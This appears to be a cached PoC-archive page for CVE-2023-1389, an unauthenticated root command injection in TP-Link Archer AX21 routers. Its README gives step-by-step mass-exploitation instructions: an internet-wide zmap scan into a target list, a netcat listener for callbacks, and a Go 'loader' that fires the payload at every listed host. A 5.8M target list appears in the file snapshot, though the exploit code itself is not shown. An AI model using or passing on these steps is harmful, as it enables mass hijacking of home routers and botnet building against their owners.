CVE-2023-1389 PoC — TP-LINK Archer AX21 命令注入漏洞

Source

https://github.com/Terminal1337/CVE-2023-1389

Associated Vulnerability

Title:TP-LINK Archer AX21 命令注入漏洞 (CVE-2023-1389)
Description:TP-LINK Archer AX21是中国普联（TP-LINK）公司的一款无线路由器。 TP-LINK Archer AX21 1.1.4 Build 20230219之前的固件版本存在安全漏洞，该漏洞源于存在命令注入漏洞，未经身份验证的攻击者利用该漏洞可以通过简单的POST请求注入以root身份运行的命令。

Description

TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]

Readme

TP-Link Archer AX21 - Unauthenticated Command Injection [Loader POC]
# CVE-2023-1389
# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
# Date Found : 07/25/2023
# Exploit Author: Voyag3r


```
How to Use :-

*Scanning*
- Use Zmap  : zmap -p 80 -o list.txt 

*NetCat Listener
- apt install netcat -y
- nc lnvp <port>

*Loader
- go run . --host=<netcat_listener_ip> --port=<netcat_listener_port> --list=list.txt --threads=<threads>

* Logging
- Error : Webserver Inactive or unresponsive
- Success : Payload Sent with Request Code 200
- Status : Response Code
```

File Snapshot


 [4.0K]  /data/pocs/aeaeb979947af3e3fa8913f5fa0193b93dcd941d
├── [ 142]  go.mod
├── [ 340]  go.sum
├── [5.8M]  list.txt
├── [1.8K]  main.go
└── [ 585]  README.md

0 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!